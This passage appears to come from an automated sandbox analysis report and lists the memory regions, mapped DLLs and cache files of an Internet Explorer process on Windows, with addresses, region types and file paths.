filename = "" Region: id = 1258 start_va = 0x3110000 end_va = 0x3110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003110000" filename = "" Region: id = 1259 start_va = 0x3120000 end_va = 0x3120fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003120000" filename = "" Region: id = 1260 start_va = 0x3130000 end_va = 0x3130fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003130000" filename = "" Region: id = 1261 start_va = 0x3140000 end_va = 0x3140fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003140000" filename = "" Region: id = 1262 start_va = 0x3150000 end_va = 0x3150fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003150000" filename = "" Region: id = 1263 start_va = 0x3160000 end_va = 0x3160fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003160000" filename = "" Region: id = 1264 start_va = 0x3170000 end_va = 0x3170fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003170000" filename = "" Region: id = 1265 start_va = 0x3180000 end_va = 0x3182fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003180000" filename = "" Region: id = 1266 start_va = 0x3190000 end_va = 0x3192fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003190000" filename = "" Region: id = 1267 start_va = 0x31a0000 end_va = 0x31a2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031a0000" filename = "" Region: id = 1268 start_va = 0x31b0000 end_va = 0x36a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000031b0000" filename = "" Region: id = 1269 start_va = 0x36b0000 end_va = 0x46effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 1270 start_va = 0x46f0000 end_va = 0x46f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046f0000" filename = "" Region: id = 1271 start_va = 0x4700000 end_va = 0x4700fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 1272 start_va = 0x4710000 end_va = 0x4710fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004710000" filename = "" Region: id = 1273 start_va = 0x4720000 end_va = 0x4720fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004720000" filename = "" Region: id = 1274 start_va = 0x4730000 end_va = 0x4730fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004730000" filename = "" Region: id = 1275 start_va = 0x4740000 end_va = 0x4740fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004740000" filename = "" Region: id = 1276 start_va = 0x4750000 end_va = 0x4750fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004750000" filename = "" Region: id = 1277 start_va = 0x4760000 end_va = 0x4760fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004760000" filename = "" Region: id = 1278 start_va = 0x4770000 end_va = 0x4770fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004770000" filename = "" Region: id = 1279 start_va = 0x4780000 end_va = 0x4780fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004780000" filename = "" Region: id = 1280 start_va = 0x4790000 end_va = 0x4790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004790000" filename = "" Region: id = 1281 start_va = 0x47a0000 end_va = 0x47a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047a0000" filename = "" Region: id = 1282 start_va = 0x47b0000 end_va = 0x47b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 1283 start_va = 0x47c0000 end_va = 0x47c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047c0000" filename = "" Region: id = 1284 start_va = 0x47d0000 end_va = 0x47d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047d0000" filename = "" Region: id = 1285 start_va = 0x47e0000 end_va = 0x47e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047e0000" filename = "" Region: id = 1286 start_va = 0x47f0000 end_va = 0x47f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047f0000" filename = "" Region: id = 1287 start_va = 0x4800000 end_va = 0x4800fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 1288 start_va = 0x4810000 end_va = 0x4810fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 1289 start_va = 0x4820000 end_va = 0x4820fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004820000" filename = "" Region: id = 1290 start_va = 0x4830000 end_va = 0x4830fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004830000" filename = "" Region: id = 1291 start_va = 0x4840000 end_va = 0x4840fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004840000" filename = "" Region: id = 1292 start_va = 0x4850000 end_va = 0x4850fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004850000" filename = "" Region: id = 1293 start_va = 0x4860000 end_va = 0x4860fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004860000" filename = "" Region: id = 1294 start_va = 0x4870000 end_va = 0x496ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004870000" filename = "" Region: id = 1295 start_va = 0x4970000 end_va = 0x4972fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004970000" filename = "" Region: id = 1296 start_va = 0x4980000 end_va = 0x4980fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004980000" filename = "" Region: id = 1297 start_va = 0x4990000 end_va = 0x4990fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004990000" filename = "" Region: id = 1298 start_va = 0x49a0000 end_va = 0x49a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049a0000" filename = "" Region: id = 1299 start_va = 0x49b0000 end_va = 0x49b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049b0000" filename = "" Region: id = 1300 start_va = 0x49c0000 end_va = 0x49c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049c0000" filename = "" Region: id = 1301 start_va = 0x49d0000 end_va = 0x49d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 1302 start_va = 0x49e0000 end_va = 0x49e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049e0000" filename = "" Region: id = 1303 start_va = 0x49f0000 end_va = 0x49f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049f0000" filename = "" Region: id = 1304 start_va = 0x4a00000 end_va = 0x4a00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a00000" filename = "" Region: id = 1305 start_va = 0x4a10000 end_va = 0x4a10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a10000" filename = "" Region: id = 1306 start_va = 0x4a20000 end_va = 0x4a20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a20000" filename = "" Region: id = 1307 start_va = 0x4a30000 end_va = 0x4a30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a30000" filename = "" Region: id = 1308 start_va = 0x4a40000 end_va = 0x4a40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a40000" filename = "" Region: id = 1309 start_va = 0x4a50000 end_va = 0x4a52fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a50000" filename = "" Region: id = 1310 start_va = 0x4a60000 end_va = 0x4a62fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a60000" filename = "" Region: id = 1311 start_va = 0x4a70000 end_va = 0x4a70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a70000" filename = "" Region: id = 1312 start_va = 0x4a80000 end_va = 0x4a80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a80000" filename = "" Region: id = 1313 start_va = 0x4a90000 end_va = 0x4a90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a90000" filename = "" Region: id = 1314 start_va = 0x4aa0000 end_va = 0x4aa0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004aa0000" filename = "" Region: id = 1315 start_va = 0x4ab0000 end_va = 0x4ab4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ab0000" filename = "" Region: id = 1316 start_va = 0x4ac0000 end_va = 0x4adffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004ac0000" filename = "" Region: id = 1317 start_va = 0x4ae0000 end_va = 0x4ae0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ae0000" filename = "" Region: id = 1318 start_va = 0x4af0000 end_va = 0x4af0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004af0000" filename = "" Region: id = 1319 start_va = 0x4b00000 end_va = 0x4b0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b00000" filename = "" Region: id = 1320 start_va = 0x4b10000 end_va = 0x4c0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b10000" filename = "" Region: id = 1321 start_va = 0x4c10000 end_va = 0x4c10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c10000" filename = "" Region: id = 1322 start_va = 0x4c20000 end_va = 0x4c20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c20000" filename = "" Region: id = 1323 start_va = 0x4c30000 end_va = 0x4d2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c30000" filename = "" Region: id = 1324 start_va = 0x4d30000 end_va = 0x4e0ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1325 start_va = 0x4e10000 end_va = 0x4e10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 1326 start_va = 0x4e20000 end_va = 0x4e26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004e20000" filename = "" Region: id = 1327 start_va = 0x4e30000 end_va = 0x4e3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004e30000" filename = "" Region: id = 1328 start_va = 0x4e60000 end_va = 0x4e62fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004e60000" filename = "" Region: id = 1329 start_va = 0x4e70000 end_va = 0x4e70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004e70000" filename = "" Region: id = 1330 start_va = 0x4e80000 end_va = 0x4e80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004e80000" filename = "" Region: id = 1331 start_va = 0x4e90000 end_va = 0x4e90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004e90000" filename = "" Region: id = 1332 start_va = 0x4ea0000 end_va = 0x4ea0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004ea0000" filename = "" Region: id = 1333 start_va = 0x4eb0000 end_va = 0x4eb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004eb0000" filename = "" Region: id = 1334 start_va = 0x4ec0000 end_va = 0x4ec0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004ec0000" filename = "" Region: id = 1335 start_va = 0x4ed0000 end_va = 0x4edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004ed0000" filename = "" Region: id = 1336 start_va = 0x4ee0000 end_va = 0x4fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004ee0000" filename = "" Region: id = 1337 start_va = 0x4fe0000 end_va = 0x50dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004fe0000" filename = "" Region: id = 1338 start_va = 0x50e0000 end_va = 0x51dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000050e0000" filename = "" Region: id = 1339 start_va = 0x51e0000 end_va = 0x52dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051e0000" filename = "" Region: id = 1340 start_va = 0x52e0000 end_va = 0x56dafff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000052e0000" filename = "" Region: id = 1341 start_va = 0x56e0000 end_va = 0x57dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000056e0000" filename = "" Region: id = 1342 start_va = 0x57e0000 end_va = 0x59dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000057e0000" filename = "" Region: id = 1343 start_va = 0x5ae0000 end_va = 0x5ae0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005ae0000" filename = "" Region: id = 1344 start_va = 0x5af0000 end_va = 0x5af0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005af0000" filename = "" Region: id = 1345 start_va = 0x5b00000 end_va = 0x5b00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b00000" filename = "" Region: id = 1346 start_va = 0x5b10000 end_va = 0x5b10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b10000" filename = "" Region: id = 1347 start_va = 0x5b20000 end_va = 0x5b20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b20000" filename = "" Region: id = 1348 start_va = 0x5b30000 end_va = 0x5b30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b30000" filename = "" Region: id = 1349 start_va = 0x5b40000 end_va = 0x5b40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b40000" filename = "" Region: id = 1350 start_va = 0x5b50000 end_va = 0x5b52fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005b50000" filename = "" Region: id = 1351 start_va = 0x5b60000 end_va = 0x5b63fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1352 start_va = 0x5b70000 end_va = 0x5b86fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000d.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000d.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000d.db") Region: id = 1353 start_va = 0x5b90000 end_va = 0x5b90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005b90000" filename = "" Region: id = 1354 start_va = 0x5ba0000 end_va = 0x5be4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 1355 start_va = 0x5bf0000 end_va = 0x5bf3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1356 start_va = 0x5c00000 end_va = 0x5c8dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 1357 start_va = 0x5c90000 end_va = 0x5c92fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005c90000" filename = "" Region: id = 1358 start_va = 0x5ca0000 end_va = 0x5ca0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msfeedsbs.dll.mui" filename = "\\Windows\\System32\\en-US\\msfeedsbs.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\msfeedsbs.dll.mui") Region: id = 1359 start_va = 0x5cb0000 end_va = 0x5cb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005cb0000" filename = "" Region: id = 1360 start_va = 0x5cc0000 end_va = 0x5cc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005cc0000" filename = "" Region: id = 1361 start_va = 0x5cd0000 end_va = 0x5cd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005cd0000" filename = "" Region: id = 1362 start_va = 0x5ce0000 end_va = 0x5ce0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005ce0000" filename = "" Region: id = 1363 start_va = 0x5cf0000 end_va = 0x5cf1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005cf0000" filename = "" Region: id = 1364 start_va = 0x5d00000 end_va = 0x5d01fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005d00000" filename = "" Region: id = 1365 start_va = 0x5d10000 end_va = 0x5d3dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005d10000" filename = "" Region: id = 1366 start_va = 0x5d40000 end_va = 0x6240fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "suggestedsites.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Low\\SuggestedSites.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\low\\suggestedsites.dat") Region: id = 1367 start_va = 0x6250000 end_va = 0x664ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006250000" filename = "" Region: id = 1368 start_va = 0x6650000 end_va = 0x674ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006650000" filename = "" Region: id = 1369 start_va = 0x6750000 end_va = 0x7113fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006750000" filename = "" Region: id = 1370 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1371 start_va = 0x7fff0000 end_va = 0x87ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1372 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 1373 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 1374 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 1375 start_va = 0x7ff6fbd50000 end_va = 0x7ff6fbe19fff monitored = 0 entry_point = 0x7ff6fbd521f0 region_type = mapped_file name = "iexplore.exe" filename = "\\Program Files\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files\\internet explorer\\iexplore.exe") Region: id = 1376 start_va = 0x7ffd8bbc0000 end_va = 0x7ffd8d34cfff monitored = 0 entry_point = 0x7ffd8bdc0f70 region_type = mapped_file name = "mshtml.dll" filename = "\\Windows\\System32\\mshtml.dll" (normalized: "c:\\windows\\system32\\mshtml.dll") Region: id = 1377 start_va = 0x7ffd8d350000 end_va = 0x7ffd8d501fff monitored = 0 entry_point = 0x7ffd8d3ab1c0 region_type = mapped_file name = "ieapfltr.dll" filename = "\\Windows\\System32\\ieapfltr.dll" (normalized: "c:\\windows\\system32\\ieapfltr.dll") Region: id = 1378 start_va = 0x7ffd8d510000 end_va = 0x7ffd8e1dcfff monitored = 0 entry_point = 0x7ffd8d65e880 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 1379 start_va = 0x7ffd8e610000 end_va = 0x7ffd8e6d4fff monitored = 0 entry_point = 0x7ffd8e611640 region_type = mapped_file name = "msfeeds.dll" filename = "\\Windows\\System32\\msfeeds.dll" (normalized: "c:\\windows\\system32\\msfeeds.dll") Region: id = 1380 start_va = 0x7ffd8fc80000 end_va = 0x7ffd8fd2bfff monitored = 0 entry_point = 0x7ffd8fc859c0 region_type = mapped_file name = "ieproxy.dll" filename = "\\Windows\\System32\\ieproxy.dll" (normalized: "c:\\windows\\system32\\ieproxy.dll") Region: id = 1381 start_va = 0x7ffd8fe30000 end_va = 0x7ffd8fec3fff monitored = 0 entry_point = 0x7ffd8fe42950 region_type = mapped_file name = "ieui.dll" filename = "\\Windows\\System32\\ieui.dll" (normalized: "c:\\windows\\system32\\ieui.dll") Region: id = 1382 start_va = 0x7ffd90410000 end_va = 0x7ffd9047cfff monitored = 0 entry_point = 0x7ffd90424ce0 region_type = mapped_file name = "ieshims.dll" filename = "\\Program Files\\Internet Explorer\\IEShims.dll" (normalized: "c:\\program files\\internet explorer\\ieshims.dll") Region: id = 1383 start_va = 0x7ffd91280000 end_va = 0x7ffd9131bfff monitored = 0 entry_point = 0x7ffd912d96a0 region_type = mapped_file name = "efswrt.dll" filename = "\\Windows\\System32\\efswrt.dll" (normalized: "c:\\windows\\system32\\efswrt.dll") Region: id = 1384 start_va = 0x7ffd928e0000 end_va = 0x7ffd928edfff monitored = 0 entry_point = 0x7ffd928e4c60 region_type = mapped_file name = "tokenbinding.dll" filename = "\\Windows\\System32\\tokenbinding.dll" (normalized: "c:\\windows\\system32\\tokenbinding.dll") Region: id = 1385 start_va = 0x7ffd92930000 end_va = 0x7ffd9296dfff monitored = 0 entry_point = 0x7ffd92939650 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll") Region: id = 1386 start_va = 0x7ffd96c50000 end_va = 0x7ffd96c65fff monitored = 0 entry_point = 0x7ffd96c53a10 region_type = mapped_file name = "msfeedsbs.dll" filename = "\\Windows\\System32\\msfeedsbs.dll" (normalized: "c:\\windows\\system32\\msfeedsbs.dll") Region: id = 1387 start_va = 0x7ffd96d00000 end_va = 0x7ffd96d13fff monitored = 0 entry_point = 0x7ffd96d03710 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 1388 start_va = 0x7ffd96db0000 end_va = 0x7ffd96dcdfff monitored = 0 entry_point = 0x7ffd96dbef80 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 1389 start_va = 0x7ffd97b60000 end_va = 0x7ffd97dedfff monitored = 0 entry_point = 0x7ffd97c30f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 1390 start_va = 0x7ffd9a650000 end_va = 0x7ffd9a69ffff monitored = 0 entry_point = 0x7ffd9a652580 region_type = mapped_file name = "edputil.dll" filename = "\\Windows\\System32\\edputil.dll" (normalized: "c:\\windows\\system32\\edputil.dll") Region: id = 1391 start_va = 0x7ffd9a6a0000 end_va = 0x7ffd9ab3ffff monitored = 0 entry_point = 0x7ffd9a738740 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\System32\\ExplorerFrame.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll") Region: id = 1392 start_va = 0x7ffd9ab40000 end_va = 0x7ffd9ab89fff monitored = 0 entry_point = 0x7ffd9ab45800 region_type = mapped_file name = "dataexchange.dll" filename = "\\Windows\\System32\\DataExchange.dll" (normalized: "c:\\windows\\system32\\dataexchange.dll") Region: id = 1393 start_va = 0x7ffd9ab90000 end_va = 0x7ffd9abf9fff monitored = 0 entry_point = 0x7ffd9aba5e90 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 1394 start_va = 0x7ffd9ac70000 end_va = 0x7ffd9ad3dfff monitored = 0 entry_point = 0x7ffd9aca14c0 region_type = mapped_file name = "tokenbroker.dll" filename = "\\Windows\\System32\\TokenBroker.dll" (normalized: "c:\\windows\\system32\\tokenbroker.dll") Region: id = 1395 start_va = 0x7ffd9ad40000 end_va = 0x7ffd9ae38fff monitored = 0 entry_point = 0x7ffd9ad88000 region_type = mapped_file name = "settingsynccore.dll" filename = "\\Windows\\System32\\SettingSyncCore.dll" (normalized: "c:\\windows\\system32\\settingsynccore.dll") Region: id = 1396 start_va = 0x7ffd9ae40000 end_va = 0x7ffd9ae54fff monitored = 0 entry_point = 0x7ffd9ae42c90 region_type = mapped_file name = "settingsyncpolicy.dll" filename = "\\Windows\\System32\\SettingSyncPolicy.dll" (normalized: "c:\\windows\\system32\\settingsyncpolicy.dll") Region: id = 1397 start_va = 0x7ffd9ae60000 end_va = 0x7ffd9b017fff monitored = 0 entry_point = 0x7ffd9aece630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 1398 start_va = 0x7ffd9b400000 end_va = 0x7ffd9b40bfff monitored = 0 entry_point = 0x7ffd9b4035c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1399 start_va = 0x7ffd9c660000 end_va = 0x7ffd9c8d3fff monitored = 0 entry_point = 0x7ffd9c6d0400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 1400 start_va = 0x7ffd9cb70000 end_va = 0x7ffd9cde9fff monitored = 0 entry_point = 0x7ffd9cb8a7a0 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 1401 start_va = 0x7ffd9ece0000 end_va = 0x7ffd9ece9fff monitored = 0 entry_point = 0x7ffd9ece14c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1402 start_va = 0x7ffd9f050000 end_va = 0x7ffd9f05bfff monitored = 0 entry_point = 0x7ffd9f051860 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\System32\\davhlpr.dll" (normalized: "c:\\windows\\system32\\davhlpr.dll") Region: id = 1403 start_va = 0x7ffd9f1b0000 end_va = 0x7ffd9f1c4fff monitored = 0 entry_point = 0x7ffd9f1b2dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 1404 start_va = 0x7ffd9f2c0000 end_va = 0x7ffd9f2c6fff monitored = 0 entry_point = 0x7ffd9f2c1220 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\System32\\msimg32.dll" (normalized: "c:\\windows\\system32\\msimg32.dll") Region: id = 1405 start_va = 0x7ffda02f0000 end_va = 0x7ffda02fdfff monitored = 0 entry_point = 0x7ffda02f1460 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 1406 start_va = 0x7ffda0310000 end_va = 0x7ffda0376fff monitored = 0 entry_point = 0x7ffda03163e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1407 start_va = 0x7ffda0aa0000 end_va = 0x7ffda0af4fff monitored = 0 entry_point = 0x7ffda0aa3fb0 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 1408 start_va = 0x7ffda0c20000 end_va = 0x7ffda0c47fff monitored = 0 entry_point = 0x7ffda0c28c10 region_type = mapped_file name = "idstore.dll" filename = "\\Windows\\System32\\IDStore.dll" (normalized: "c:\\windows\\system32\\idstore.dll") Region: id = 1409 start_va = 0x7ffda1290000 end_va = 0x7ffda1357fff monitored = 0 entry_point = 0x7ffda12d13f0 region_type = mapped_file name = "winhttp.dll" filename = 